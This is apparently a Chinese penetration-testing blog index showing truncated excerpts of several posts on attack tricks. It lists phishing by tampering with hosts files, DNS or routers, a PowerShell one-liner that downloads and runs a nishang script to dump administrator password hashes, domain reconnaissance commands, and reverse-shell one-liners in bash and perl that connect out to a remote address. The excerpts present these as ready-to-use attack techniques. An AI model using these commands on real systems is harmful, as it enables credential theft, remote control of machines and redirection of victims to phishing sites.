in 渗透案例奇技淫巧

0x00常见网络钓鱼方式 攻击者进行网络钓鱼的方式常有以下几种: 1、通过修改受害者hosts文件(C:\WINDOWS\system32\drivers\etc\hosts)来实现; 2、通过修改受害者dns来实现; 3、已经进入路由器,直接修改路由器的DNS。 罗列的并不全,之后遇到...

in 奇技淫巧

使用powershell远程调用来抓取管理hash。 在线导hash powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/...

in 渗透案例奇技淫巧

1.net view net view /domain 2.set log set log 3.通过srv记录 nslookup -type=SRV _ldap._tcp.corp

in 渗透案例奇技淫巧

反弹的各种姿势。 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成,所以某些情况下不支持 perl版本: perl -e 'use Socket;$i="10.0.0....

in 奇技淫巧

使用wmic识别安装到系统中的补丁情况 C:\> wmic qfe get description,installedOn 识别正在运行的服务 C:\>sc query type= service C:\>net start 识别开机启动的程序,包括路径 C:\>w...